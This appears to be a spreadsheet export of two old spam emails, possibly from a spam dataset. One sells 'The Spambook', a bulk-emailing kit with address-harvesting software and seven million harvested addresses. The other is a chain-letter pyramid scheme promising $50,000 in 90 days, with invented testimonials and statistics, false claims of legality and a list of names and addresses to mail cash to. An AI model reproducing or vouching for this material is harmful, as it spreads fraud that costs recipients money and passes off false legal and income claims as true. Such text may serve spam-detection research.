    <t>Hi,\n\nI'm a college dropout.  I work about two hours a day.  \nI'm ambitious, but extremely lazy, and I make over \n$250,000 a year.  Are you curious yet?\n\nIn a minute I'm going to tell you my secret,\nit's the dirty little secret of the Internet ...\n\nYou've probably heard stories about people making\nwhopping huge money online, but you thought they \nwere the big corporate execs, famous programmers, or\nboy-geniuses.\n\nWell, grasshopper, think again ...\n\nIt's people like you and me that are making the real\nmoney.  Yep, people like YOU AND ME!\n\nEver since the "dot com bubble" burst in 1999, small-time\nentrepreneurs are getting richer while the Fortune 500 \ncompanies look for bankruptcy lawyers.\n\nToday small business owners and ordinary folks \nlike you and me can use the web to achieve complete \nfinancial freedom with NO INVESTMENT and very little \nwork.  How?  By learning the most profitable marketing \ntechnique ever created - it's called bulk email, or SPAM.\n\nIf you've ever recieved an email advertisement, then \nyou know what bulk email is.  I bet you can't click on \nDELETE fast enough for most of those ads, right?\nYou might not want their product, but remember that \nthousands of other folks probably do.  Bulk email is a \npercentage game - every bulk emailer who contacts you \nmakes a six figure income on the Internet.  I \nguarantee it.  Now let's go back to Math 101 and \nreview some numbers ...\n\nIf you sell on eBay, you pay anywhere from a few\ndollars to over a hundred dollars just to post one\nauction.  How many people see your ad?  Maybe a\ncouple thousand or even ten or twenty thousand\nover a period of days.  Using bulk email, YOU CAN\nSEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY\nat virtually no cost.  Whether your send 100,000\nemails or 100 million emails, the price is the same.\nZERO!\n\nStop paying those outrageous auction listing fees when\nhardly anyone sees your ad!\n\nImagine that you have a decent product with a \nprofit margin of $20.00 on each sale.  If you send \nan email ad to 500,000 people, and only one person \nin a thousand actually places an order, then you just \ngenerated 500 orders and made $10,000 in a few hours \nof work.  \n\nIt's that simple ...\n\nAll you have to do is convince ONE PERSON OUT OF A\nTHOUSAND to buy your stuff and you're FILTHY RICH.\n\nThe best thing is that anyone can do it.  Doesn't \nmatter if you're a nineteen-year-old college student \nusing a dorm-room computer or a fifty-year-old \nexecutive working from an office building in New \nYork City.  Anyone, and I repeat ANYONE, can start \nbulk emailing with virtually no startup costs.  All it takes \nis a  few days of study, plenty of ambition, and some \nbasic familiarity with the Internet.\n\nI quit college when I was 19 to capitalize on the \n"Dot Com" mania, and I've never looked back.  I \nstarted with no money, no product to sell, and only \nthe most rudimentary computer skills.  I saw an \nopportunity and I seized it.  A few years later, \nI bought my own home - with CASH.  \n\nYou don't need any money.  You don't need a product.\nYou don't need to be a computer nerd and no experience\nwhatsoever is required.  \n\nIf you saw an employment ad in the newspaper like that\nyou'd jump right on it.  It would be a dream come true.\nSo what are you waiting for?!\n\nI'm going to ask you four simple questions.  If you answer\nYES to all of them, then I can almost promise that you\nwill make at least $100,000 using bulk email this year.\n\nHere goes ...\n\nDo you have basic experience with the web? \nDo you have a computer and an Internet connection?\nDo you have a few hours each day of free time?  \nDo you want to earn some extra money with an eye towards \ncomplete financial freedom?  \n\nIf you answer YES to these questions, you could be\nmaking $5,000 - $20,000 per week working from your \nhome.  Kiss your day job goodbye - this sure beats \nthe 9-5 daily grind!\n\nAll you need is ambition and commitment.  This\nis no "get rich quick scheme".  You have to work\nto make big bucks, but ANYONE - and I mean ANYONE - can do \nit.\n\nYou're probably wondering if it's hard to get started.  \nDon't worry, it's not! I will show you step-by-step \nhow to start your first email campaign and how to\nbuild a booming online business.  You'll be generating \norders - AND MAKING MONEY - in less than seven days.\n\nOkay, so what if you don't have anything to sell?\n\nNo problem!!  I'll show you where to find hot\nproducts that sell like CRAAAAAAZY! Most people delay\nstarting an Internet business because they have \nnothing to sell, but I'm removing that hurdle right now.  \nAfter reading the Spambook, you can build your complete \nproduct line in less than two hours!  There is NO EXCUSE \nnot to get started! I will get you up-and-running within \nseven days. In fact ...\n\nI personally guarantee that you will start your own \nbulk email campaign less than a week after reading \nthe Spambook!  I'll give you a toll-free phone number \nto reach me 24 hours a day, seven days a week; \nwhere else will you find that level of service?!\n\nI will also include a step-by-step guide to starting \nyour very first email campaign called "Seven Days to \nBulk Email Success".  This seperate guide contains a daily \nroutine for you to follow with specific, exact \ninstructions on how to get started.  On day one, for \nexample, I teach you where to find a product to sell. \nThe next day you learn how to build a fresh mailing \nlist.  On the seventh day, you just click send!  Your \nvery first campaign is ready to go.\n\nAs a special bonus, you'll recieve a FREE copy \nof our STEALTH MASS MAILER, a very powerful bulk \nemail program which retails for $49.99! I'll even\ninclude 7 million email addresses absolutely FREE\nif you order NOW!\n\nStop wasting your money on auction listing fees, \nclassifieds, and banner ads - they don't work, and \nnever will!  If you are SERIOUS about making money \non the Internet, bulk email is your only option.  \nWhat are you waiting for?  Few of us are willing \nto share this knowledge, but I promise to teach \nyou everything I know about bulk emailing in this \nextraordinary bulk emailer's handbook ... The Spambook! \n\nOnce again, here's the deal.  You give me $29.99.  \nI give you ALL THE TOOLS YOU NEED to become a\nsuccessful, high profit email bulk emailer.  INCLUDING:\n\n** THE SPAMBOOK\nTeaches you step-by-step how to become a high profit\nbulk emailer.  Secret techniques and tips never\nbefore revealed.\n\n** SEVEN DAYS TO BULK EMAIL SUCCESS\nProvides detailed day-by-day instruction to start sending\nyour first email campaign in seven days.\n\n** 600 Email subjects that PULL LIKE CRAZY\n\n** EMAIL LIST MANAGER\nManage your email lists quickly and easily.  Very \nuser-friendly, yet powerful, software.\n\n** STEALTH MASS MAILER\nSoftware can send up to 50,000 emails an hour automatically.\nJust load them in there and click SEND!\n\n** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT\nExtracts email addresses from databases and search engines\nat speeds of over 200,000 per hour.\n\n** WORLDCAST EMAIL VERIFIER\nUsed to verify your email addresses that you extract to \nmake sure they're valid.\n\n** EBOOK PUBLISHER\nEasily publish your own e-books and reports for resale using,\nyou guessed it, bulk email!\n\n** SEVEN MILLION EMAIL ADDRESSES\nThis huge list will get you started bulk emailing right away.\nI harvested these addresses myself, the list is filled\nwith IMPULSE BUYERS ready to respond to your ads!\n\nIf you added up all of the FULL VERSION BULK EMAIL software\nincluded with the Spambook package, it would total over\n$499.  I am giving you the whole bundle for only $29.99.\nThat means there is no other out-of-pocket startup expense\nfor you.  Nothing else to buy, no reason to waste money on\nsoftware that doesn't work.  With this one package, you get \nEVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  \n\nAre you willing to invest $29.99 for the opportunity\nto make a SIX FIGURE INCOME on the Internet\nwith no startup cash and very little effort?\n\nRemember, you will recieve a toll-free phone number\nfor 24 hour expert advice and consultation FROM ME\nPERSONALLY.\n\nTo order the Spambook right now for only $29.99 with \na Visa or Mastercard, please click on the link below. \nThis will take you to our secure server for order \nprocessing:\n\n[URL]https://www.paypal.com[/URL]\n\nNote: The Spambook will be delivered electronically\nwithin 24 hours. It is not available in printed form. \n\nYou may also pay with cash, check or money\norder by printing the order form below and \nsending it with your payment. \n\n------------------------- CUT HERE ----------------------- \n\nProduct: "The Spambook" \nPrice: $29.99 \n\nHOW TO ORDER BY MAIL: Print out this order \nform and send cash, personal check, money \norder or cashier's check to the address listed below: \n\nBlair Russell   \nRR#2 Coulsons Hill Road #2452\nBradford, Ontario, Canada\nL3Z 2A5\n\nYour Shipping Information: \n\nYour Name_____________________________________________ \nYour Address__________________________________________ \nYour City_____________________________________________ \nState / Zip___________________________________________ \nPhone #: _____________________________________________ \n(For problems with your order only. No salesmen will call.) \n\nEmail Address________________________________________ \n\n\nIf paying by credit card, please fill in the information below: \n\nCredit Card Number:________________________________ \nExpiration Date:___________________________ \nSignature:_________________________ \nDate:____________________ \n\n\nIMPORTANT LEGAL NOTE: There are no criminal laws against\nthe non-fraudulent sending of unsolicited commercial email \nin the United States.  However, other countries have passed\nlaws against this form of marketing, so non-US residents \nshould check local regulations before ordering.  To view\nUS State and Federal guidelines concerning bulk email, and to \ncheck foreign regulations, please visit [URL]http://www.spamlaws.com[/URL]\n\n\n\n\n8112Qkxd9-941DIFV3249esWe6-294Awtq1l33\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s://www.paypal.com http://www.spamlaws.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5433</t>
  </si>
  <si>
    <t>To: Hello@locust.minder.net\nFrom: &lt;Tonyclg123@starmail.com&gt;\nDate: Wed, 24 Jul 0102 04:01:49 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 0102 04:01:49 -0400</t>
  </si>
  <si>
    <t>&lt;Tonyclg123@starmail.com&gt;</t>
  </si>
  <si>
    <t>Hello@locust.minder.net</t>
  </si>
  <si>
    <t>&lt; Make $50,000 in 90 Days Sending Emails at Home &gt;</t>
  </si>
  <si>
    <t>Hi,\n\nYou can make $50,000 or more in the next 90 days sending e-mail.\nSeem impossible? Is there a catch?  NO, there is no catch; just\nsend your e-mails and be on your way to financial freedom.\n\nBasically, I send out as many of these e-mails as I can, then\npeople send me CASH in the mail for information that I just e-mail\nback to them. Everyday, I make a three minute drive to my P.O. Box\nknowing that there are at least a few hundred dollars waiting for\nme.  And the best part, IT IS COMPLETELY LEGAL.\n\nJust read the next few paragraphs and see what you think. If you\nlike what you read, great! If you don't, read it again because you\nmust have missed something.\n\n"AS SEEN ON NATIONAL TELEVISION"\n\n"Making over a half million dollars every 6 months from your home\nfor an investment of only $25 US dollars expense ONE TIME.  THANKS\nTO THE COMPUTER AGE AND THE INTERNET, BE A MILLIONAIRE LIKE OTHERS\nWITHIN A YEAR!!!  Before you say, "No Way!" read the following.\nThis is the letter you've been reading about in the news lately.\nDue to the popularity of this letter on the Internet, a major\nnightly news program recently devoted an entire show to the\ninvestigation of the program described below to see if it really\ncan make people money.\n\nThe show also investigated whether or not the program was legal.\nTheir findings proved once and for all that there are absolutely\nno laws prohibiting the participation in this program. This has\nhelped to show people that this is a simple, harmless, and fun way\nto make some extra money at home.\n\nThe results of this show have been truly remarkable. So many\npeople are participating that those involved are doing much better\nthan ever before. Since everyone makes more as more people try it\nout, its been very exciting to be a part of it lately. You will\nunderstand once you experience it.\n\n"HERE IT IS BELOW"\n\n*** Print This Now For Future Reference ***\n\nThe following income opportunity is one you may be interested in\ntaking a look at. It can be started with VERY LITTLE investment\n($25) and the income return is TREMENDOUS!!!\n\nTHIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.\n\nIt does not require you to come into contact with people, do any\nhard work, and best of all, you never have to leave your house\nexcept to get the mail.\n\nSimply follow the instructions, and you really can make this\nhappen. This e-mail order marketing program works every time if\nyou put in the effort to make it work. E-mail is the sales tool of\nthe future. Take advantage of this non-commercialized method of\nadvertising NOW!\n\nThe longer you wait, the more savvy people will be taking your\nbusiness using e-mail. Get what is rightfully yours. Program\nyourself for success and dare to think BIG. It sounds corny, but\nit's true. You'll never make it big if you don't have this belief\nsystem in place.\n\nMULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It\nis being taught in the Harvard Business School, and both Stanford\nResearch and the Wall Street Journal have stated that between 50%\nand 65% of all goods and services will be sold through multi-level\nmethods.\nThis is a Multi-Billion Dollar industry and of the 500,000\nmillionaires in the U.S., 20% (100,000) made their fortune in the\nlast several years in MLM. Moreover, statistics show 45people\nbecome millionaires everyday through Multi-Level Marketing.\n\nYou may have heard this story before, but Donald Trump made an\nappearance on the David Letterman show. Dave asked him what he\nwould do if he lost everything and had to start over from scratch.\nWithout hesitating Trump said he would find a good network\nmarketing company and get to work.\nThe audience, started to hoot and boo him. He looked out at the\naudience and dead-panned his response. "That's why I'm sitting up\nhere and you are all sitting out there!"\n\nWith network marketing you have two sources of income. Direct\ncommissions from sales you make yourself and commissions from\nsales made by people you introduce to the business.\n\nResidual income is the secret of the wealthy. It means investing\ntime and money once, and getting paid again and again and again.\nIn network marketing, it also means getting paid for the work of\nothers.\n\nThe enclosed information is something I almost let slip through my\nfingers. Fortunately, sometime later I reread everything and gave\nsome thought and study to it.\n\nMy name is Jonathan Rourke. Two years ago, the corporation I\nworked at for the past twelve years down- sized and my position\nwas eliminated. After unproductive job interviews, I decided to\nopen my own business. Over the past year, I incurred many\nunforeseen financial problems. I owed my family, friends and\ncreditors over $35,000. The economy was taking a toll on my\nbusiness and I just couldn't seem to make ends meet. I had to\nrefinance and borrow against my home to support my family and\nstruggling business. AT THAT MOMENT something significant happened\nin my life and I am writing to share that experience in hopes that\nthis will change your life FOREVER FINANCIALLY!!!\n\nIn mid December, I received this program via e-mail. Six month's\nprior to receiving this program, I had been sending away for\ninformation on various business opportunities. All of the programs\nI received, in my opinion were not cost effective. They were\neither too difficult for me to comprehend or the initial\ninvestment was too much for me to risk to see if they would work\nor not. One claimed that I would make a million dollars in one\nyear. It didn't tell me I'd have to write a book to make it!\n\nBut like I was saying, in December I received this program. I\ndidn't send for it, or ask for it; they just got my name off a\nmailing list. THANK GOODNESS FOR THAT!!!\nAfter reading it several times, to make sure I was reading it\ncorrectly, I couldn't believe my eyes.\n\nHere was a MONEY MAKING PHENOMENON.\n\nI could invest as much as I wanted to start without putting me\nfurther into debt. After I got a pencil and paper and figured it\nout, I would at least get my money back. But like most of you I\nwas still a little skeptical and a little worried about the legal\naspects of it all. So I checked it out with the U.S. Post Office\n(1-800-725-2161 24 hrs) and they confirmed that it is indeed\nlegal! After determining the program was LEGAL and NOT A CHAIN\nLETTER, I decided "WHY NOT."\n\nInitially I sent out 10,000 e-mails. It cost me about $15 for my\ntime on-line. The great thing about e-mail is that I don't need\nany money for printing to send out the program, and because all of\nmy orders are filled via e-mail, the only expense is my time. I am\ntelling you like it is. I hope it doesn't turn you off, but I\npromised myself that I would not 'rip-off" anyone, no matter how\nmuch money it cost me.\nHere is the basic version of what you need to do:\n\nYour first goal is to receive at least 20 orders for Report #1\nwithin 2 weeks of your first program going out. IF YOU DON'T, SEND\nOUT MORE PROGRAMS UNTIL YOU DO.\n\nYour second goal is to receive at least 150+ orders for Report #2\nwithin 4 weeks. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.\n\nOnce you have your 150 orders, relax, you've met your goal. You\nwill make $50,000+ but keep at it! If you don't get 150 right off,\nkeep at it! It may take some time for your down line to build.\nKeep at it, stay focused, and do not let yourself get distracted.\n\nIn less than one week, I was starting to receive orders for REPORT\n#1. I kept at it - kept mailing out the program and by January 13,\n1 had received 26 orders for REPORT #1. My first step in making\n$50,000 in 90 days was done.\n\nBy January 30, 1 had received 196 orders for REPORT #2; 46 more\nthan I needed. So I sat back and relaxed. By March 1, of my\ne-mailing of 10,000, I received $58,000 with more coming in every\nday. I paid off ALL my debts and bought a much needed new car.\nPlease take time to read the attached program, IT WILL CHANGE YOUR\nLIFE FOREVER!!  Remember, it won't work if you don't try it. This\nprogram does work, but you must follow it EXACTLY! Especially the\nrules of not trying to place your name in a different place. It\nwon't work, you'll lose out on a lot of money!\n\nIn order for this program to work very fast, try to meet your goal\nof 20+ orders for Report #1, and 150+ orders for Report #2 and you\nwill make $50,000 or more in 90 days. If you don't reach the first\ntwo goals with in four weeks, relax, you will still make a ton of\nmoney, it may take a few months or so longer. But keep mailing out\nthe programs and stay focused! That's the key.  I AM LIVING PROOF\nTHAT IT WORKS!!! If you choose not to participate in this program,\nI am sorry. It really is a great opportunity with little cost or\nrisk to you. If you choose to participate, follow the program and\nyou will be on your way to financial security.\n\nIf you are a fellow business owner and are in financial trouble\nlike I was, or you want to start your own business, consider this\na sign. I DID!  -Sincerely,  Jonathan Rourke\n\nP.S.  Do you have any idea what 11,700 $5 bills ($58,000) look\nlike piled up on a kitchen table? IT'S AWESOME!\n\nA PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM:\n\nBy the time you have read the enclosed program and reports, you\nshould have concluded that such a program, and one that is legal,\ncould not have been created by an amateur.\n\nLet me tell you a little about myself. I had a profitable business\nfor 10 years. Then in 1979 my business began falling off. I was\ndoing the same things that were previously successful for me, but\nit wasn't working.\n\nFinally, I figured it out. It wasn't me; it was the economy.\nInflation and recession had replaced the stable economy that had\nbeen with us since 1945.\n\nI don't have to tell you what happened to the unemployment\nrate...because many of you know from first hand experience. There\nwere more failures and bankruptcies than ever before.\n\nThe middle class was vanishing. Those who knew what they were\ndoing invested wisely and moved up. Those who did not including\nthose who never had anything to save or invest were moving down\ninto the ranks of the poor.\n\nAs the saying goes, 'THE RICH GET RICHER AND THE POOR GET POORER."\nThe traditional Methods of making money will never allow you to\n"move up" or "get rich". Inflation will see to that.\n\nYou have just received information that can give you financial\nfreedom for the rest of your life, with "NO RISK" and "JUST A\nLITTLE BIT OF EFFORT." You can make more money in the next few\nmonths than you have ever imagined.\n\nFollow the program EXACTLY AS INSTRUCTED. Do not change it in any\nway. It works exceedingly well as it is now. Remember to e-mail a\ncopy of this exciting report to everyone you can think of. One of\nthe people you send this to may send out 50,000 ... and your name\nwill be on everyone of them!\n\nRemember though, the more you send out the more potential\ncustomers you will reach.\n\nSo my friend, I have given you the ideas, information, materials\nand opportunity to become financially independent.  IT IS UP TO\nYOU NOW!\n\n"THINK ABOUT IT." Before you delete this program from your\nmailbox, as I almost did, take a little time to read it and REALLY\nTHINK ABOUT IT. Get a pencil and figure out what could happen when\nYOU participate. Figure out the worst possible response and no\nmatter how you calculate it, you will still make a lot of money!\nYou will definitely get back what you invested. Any doubts you\nhave will vanish when your first orders come in. IT WORKS! -Jody\nJacobs, Richmond, VA\n\nHERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLAR$\n\nThis method of raising capital REALLY WORKS 100% EVERY TIME. I am\nsure that you could use up to $50,000 or more in the next 90 days.\n\nBefore you say "No Way!" please read this program carefully. This\nis not a chain letter, but a perfectly legal money making\nopportunity. Basically, this is what you do:  As with all\nmultilevel businesses, we- build our business by recruiting new\npartners and selling our products. Every state in the USA allows\nyou to recruit new multilevel business partners, and we offer a\nproduct for EVERY dollar sent. YOUR ORDERS COME BY MAIL AND ARE\nFILLED BY E-MAIL, so you are not involved in personal selling. You\ndo it privately in your own home, store, or office.\n\nThis is the GREATEST Multi-Level Mail Order Marketing anywhere:\nThis is what you MUST do.\n\n1. Order all 5 reports shown on the list below (You can't sell\nthem if you don't have them).\n\n* For each report, send $5.00 CASH, the NAME &amp; NUMBER OF THE\nREPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME &amp;\nRETURN ADDRESS (in case of a problem).\n\n*MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE - IN CASE OF\nANY MAIL PROBLEMS!\n\n* When you place your order, make sure you order each of the five\nreports. You need all five reports so that you can save them on\nyour computer and resell them.\n\n* Within a few days you will receive, via e-mail, each of the five\nreports. Save them on your computer so they will be accessible for\nyou to send to the 1,000's of people who will order them from you.\n\n2. IMPORTANT- DO NOT alter the names of the people who are listed\nnext to each report, or their order\non the list in any way other than as instructed below in steps "a"\nthrough 'g" or you will lose out on the majority of your profits.\nOnce you understand the way this works you'll also see how it\ndoesn't work if you change it. Remember, this method has been\ntested, and if you alter it, it will not work.\n\na. Look below for the listing of available reports.\n\nb. After you've ordered the. five reports, take this Advertisement\nand remove the name and address under REPORT #5. This person has\nmade it through the cycle and is no doubt counting their $50,000!\n\nc. Move the name and address under REPORT #4 down to REPORT #5.\n\nd. Move the name and address under REPORT #3 down to REPORT #4.\n\ne. Move the name and address under REPORT #2 down to REPORT #3\n\nf. Move the name and address under REPORT #1 down to REPORT #2.\n\ng. Insert your name and address in the REPORT #1 position.\n\nPlease make sure you copy every name and address ACCURATELY! Copy\nand paste method works well,.\n\n3. Take this entire letter, including the modified list of names,\nand save it to your computer. Make NO changes to the Instruction\nportion of this letter.\n\nYour cost to participate in this is practically nothing (surely\nyou can afford $25). You obviously already have an Internet\nConnection and e-mail is FREE!\n\nTo assist you with marketing your business on the internet, the 5\nreports you purchase will provide you with invaluable marketing\ninformation which includes how to send bulk e-mails, where to find\nthousands of free classified ads and much, much more.\n\nHere are two primary methods of building your downline:\n\nMETHOD #1: SENDING BULK E-MAIL\n\nLet's say that you decide to start small, just to see how it goes,\nand we'll assume you and all those involved send out only 2,000\nprograms each. Let's also assume that the mailing receives a 0.5%\nresponse. Using a good list, the response could be much better.\nAlso, many people will send out hundreds of thousands of programs\ninstead of 2,000. But continuing with this example, you send out\nonly 2,000 programs. With a 0.5% response, that is only 10 orders\nfor REPORT #1. Those 10 people respond by sending out 2,000\nprograms each for a total of 20,000. Out of those 0.5%, 100 people\nrespond and order REPORT #2.\n\nThose 100 mail out 2,000 programs each for a total of 200,000. The\n0.5% response to that is 1,000 orders for REPORT #3. Those 1,000\nsend out 2,000 programs each for a 2,000,000 total. The 0.5%\nresponse to that is I 0,000 orders for REPORT #4. That amounts to\n10,000 each of $5 bills for you in CASH MONEY! Then think about\nlevel five!  That's $500,000 alone!\n\nYour total income in this example is $50 + $500 + $5,000+ $50,000\n+ $500,000 for a total of $555,550!!!\n\nREMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF THE 2,000 PEOPLE\nYOU MAIL TO WILL DO ABSOLUTELY NOTHING AND TRASH THIS PROGRAM!\nDARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE, OR HALF\nSENT OUT 100,000 PROGRAMS INSTEAD OF 2,000. Believe me, many\npeople will do just that and more!\n\nREPORT #2 will show you the best methods for bulk e-mailing, and\ne-mail software.\n\nMETHOD #2 - PLACING FREE ADS ON THE INTERNET\n\n1. Advertising on the Net is very, very inexpensive, and there are\nHUNDREDS of FREE places to advertise. Let's say you decide to\nstart small just to see how well it works. Assume your goal is to\nget ONLY 10 people to participate on your first level. Placing a\nlot of FREE ads on the internet will EASILY get a larger response.\nAlso assume that everyone else in YOUR ORGANIZATION gets ONLY 10\ndownline members. Follow this example to achieve the STAGGERING\nresults below:\n\n1st level-your 10 members with $5 ....... $50\n2nd level-10 members from those 10 ($5 x 100) ....... $500\n3rd level-10 members from those 100 ($5 x 1,000).......  $5,000\n4th level-10 members from those 1,000 ($5 x 10k) .......  $50,000\n5th level-10 members from those 10,000 ($5 x 100k) .......  $500,000\n\nTHIS TOTALS     -      $555,550\n\nRemember friends, this assumes that the people who participate\nonly recruit 10 people each. Think for a moment what would happen\nif they got 20 people to participate! Most people get 100's of\nparticipants.\n\nTHINK ABOUT IT! For every $5.00 you receive, all you must do is\ne-mail them the report they ordered. THAT'S IT! ALWAYS PROVIDE\nSAME-DAY SERVICE ON ALL ORDERS! This will guarantee that the\ne-mail THEY send out with YOUR name and address on it will be\nprompt because they can't advertise until they receive the report!\n\nAVAILABLE REPORTS         *** Order Each REPORT by NUMBER, AND\nNAME ***\n\n* ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH REPORT. CHECKS NOT\nACCEPTED * - ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL - Make\nsure the cash is concealed by wrapping it in at least two sheets\nof paper (SO THAT THE BILL CAN'T BE SEEN AGAINST LIGHT)  On one of\nthose sheets of paper include:\n(a) the number &amp; name of the report you are ordering,\n(b) your e-mail address, and\n(c) your name &amp; postal address (in case your e-mail provider\nencounters problems).\n\nPLACE YOUR ORDER FOR THESE REPORTS NOW:\n\nREPORT #1 "The Insiders Guide to Advertising for Free on the Internet"\n\nORDER REPORT #1 FROM:\n\nTony Goon\n120 - 8511 Westminster Hwy.\nRichmond, BC. V6X 3H7\nCANADA\n\n\nREPORT #2 "The Insiders Guide to Sending Bulk E-mail on the Internet"\n\nORDER REPORT #2 FROM:\n\nJulie Lind\nBlk B 5-15,Prisma Perdana,\nJalan Midah 8 A,Cheras\n56000 Kuala Lumpur,\nMALAYSIA.\n\n\nREPORT #3 "The Secrets to Multilevel Marketing on the Internet"\n\nORDER REPORT #3 FROM:\n\nMike IAT				\nPO Box 11360,\n50742 Kuala Lumpur,\nMALAYSIA.\n\n\nREPORT #4 'How to become a Millionaire utilizing the Power of \nMultilevel Marketing and the Internet"\n\nORDER REPORT #4 FROM:\n\nKen Leung\nFlat B, 5/F, BLK 5,\nSerenity Park, Tai Po, N.T.\nHong Kong\n\n\nREPORT #5 "How to Send One Million E-Mails for Free."\n\nORDER REPORT #5 FROM:\n\nRandy Dallard\nP.O. Box 8\nOsprey, FL 34229\nU.S.A.\n\nAbout 50,000 new people get online every month!\n\n******* TIPS FOR SUCCESS *******\n\n* TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow\nthe directions accurately.\n\n* Send for the five reports IMMEDIATELY so you will have them when\nthe orders start coming in. When you receive a $5 order, you MUST\nsend out the requested product/report.\n\n* ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.\n\n* Be patient and persistent with this program. If you follow the\ninstructions exactly, your results WILL BE SUCCESSFUL!\n\n* ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!\n\n******* YOUR SUCCESS GUIDELINES *******\n\nFollow these guidelines to guarantee your success:\n\nStart posting ads as soon as you mail off for the reports! By the\ntime you start receiving orders, your reports will be in your\nmailbox! For now, something simple, such as posting on message\nboards something to the effect of "Would you like to know how to\nearn $50,000 working out of your house with NO initial investment?\nEmail me with the keywords "more info" to find out how. And, when\nthey email you, send them this report in response!\n\nIf you don't receive 20 orders for REPORT #1 within two weeks,\ncontinue advertising or sending e-mails until you do.\n\nThen, a couple of weeks later you should receive at least 100\norders for REPORT#2. If you don't, continue advertising or sending\ne-mails until you do. Once you have received 100 or more orders\nfor REPORT #2, YOU CAN RELAX, because the system is already\nworking for you, and the cash will continue to roll in!\n\nTHIS IS IMPORTANT TO REMEMBER: Every time your name is moved down\non the list you are placed in front of a DIFFERENT report. You can\nKEEP TRACK of your PROGRESS by watching which report people are\nordering from you. If you want to generate more income, send\nanother batch of e-mails or continue placing ads and start the\nwhole process again! There is no limit to the income you will\ngenerate from this business!\n\nBefore you make your decision as to whether or not you participate\nin this program, answer one question ...\nDO YOU WANT TO CHANGE YOUR LIFE? If the answer is yes, please look\nat the following facts about this program:\n\n1. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO\nPRODUCE!\n\n2. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO SHIP!\n\n3. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST YOU ANYTHING TO\nADVERTISE!\n\n4. YOU ARE UTILIZING THE POWER OF THE INTERNET AND THE POWER OF\nMULTI-LEVEL MARKETING TO DISTRIBUTE YOUR PRODUCT ALL OVER THE\nWORLD!\n\n5. YOUR ONLY EXPENSES OTHER THAN YOUR INITIAL $25 INVESTMENT IS\nYOUR TIME!\n\n6. VIRTUALLY ALL OF THE INCOME YOU GENERATE FROM THIS PROGRAM IS\nPURE PROFIT!\n\n7. THIS PROGRAM WILL CHANGE YOUR LIFE FOREVER.\n\n******* TESTIMONIALS*******\n\nThis program does work, but you must follow it EXACTLY! Especially\nthe rule of not trying to place your name in a different position,\nit won't work and you'll lose a lot of potential income. I'm\nliving proof that it works. It really is a great opportunity to\nmake relatively easy money, with little cost to you. If you do\nchoose to participate, follow the program exactly, and you'll be\non your way to financial security. -Steven Bardfield, Portland, OR\n\nMy name is Mitchell.  My wife, Jody, and I live in Chicago, IL. I\nam a cost accountant with a major U.S. Corporation and I make\npretty good money. When I received the program I grumbled to Jody\nabout receiving "junk mail." I made fun of the whole thing,\nspouting my knowledge of the population and percentages involved.\nI 'knew' it wouldn't work. Jody totally ignored my supposed\nintelligence and jumped in with both feet. I made merciless fun of\nher, and was ready to lay the old 'I told you so' on her when the\nthing didn't work... well, the laugh was on me! Within two weeks\nshe had received over 50 responses. Within 45 days she had\nreceived over $147,200 in $5 bills! I was shocked! I was sure that\nI had it all figured and that it wouldn't work. I AM a believer\nnow. I have joined Jody in her "hobby. " I did have seven more\nyears until retirement, but I think of the 'rat race,' and it's\nnot for me. We owe it all to MLM. -Mitchell Wolf MD., Chicago, IL.\n\nThe. main reason for this letter is to convince you that this\nsystem is honest, lawful, extremely profitable, and is a way to\nget a large amount of money in a short time. I was approached\nseveral times before 1 checked this out. I joined just to see what\none could expect in return for the minimal effort and money\nrequired. To my astonishment I received $36,470.00 in the first 14\nweeks, with money still coming in.\n-Charles Morris, Esq.\n\nNot being the gambling type, it took me several weeks to make up\nmy mind to participate in this plan. But conservative that I am, I\ndecided that the initial investment was so little that there was\njust no way that I wouldn't get enough orders to at least get my\nmoney back. Boy, was I surprised when I found my medium- size post\noffice box crammed with orders! For awhile, it got so overloaded\nthat I had to start picking up my mail at the window. I'll make\nmore money this year than any 10 years of my life before. The nice\nthing about this deal is that it doesn't matter where people live.\nThere simply isn't a better investment with a faster return.\n-Paige Willis, Des Moines, IA\n\nI had received this program before. I deleted it, but later I\nwondered if I shouldn't have given it a try. Of course, I had no\nidea who to contact to get another copy, so I had to wait until I\nwas e-mailed another program ... 11 months passed then it came ...\nI didn't delete this one! ... I made. more than $41,000 on the\nfirst try!!  -Violet Wilson, Johnstown, PA\n\nThis is my third time to participate in this plan. We have quit\nour jobs, and will soon buy a home on the beach and live off the\ninterest on our money. The only way on earth that this plan will\nwork for you is if you do it. For your sake, and for your family's\nsake don't pass up this golden opportunity. Good luck and happy\nspending!  -Kerry Ford, Centerport, NY\n\nIT IS UP TO YOU NOW!  Take 5 minutes to Change Your Future!\n\nORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL\nFREEDOM!\n\nFOR YOUR INFORMATION: If you need help with starting a business,\nregistering a business name, learning how income tax is handled,\netc., contact your local office of the Small Business\nAdministration (a Federal agency) 1(800) 827-5722 for free help\nand answers to questions. Also, the Internal Revenue Service\noffers free help via telephone and free seminars about business\ntax requirements.\n\nUnder Bill S1618 Title HI passed by the 105th US Congress this\nletter cannot be considered spam as long as the sender includes\ncontact information and a method of removal. \n\nThis is not a spam! Your are receiving this email either because, \nyou have sent me and email in the past, or you are on a list of \nmarketers requesting information. If this is not the case, 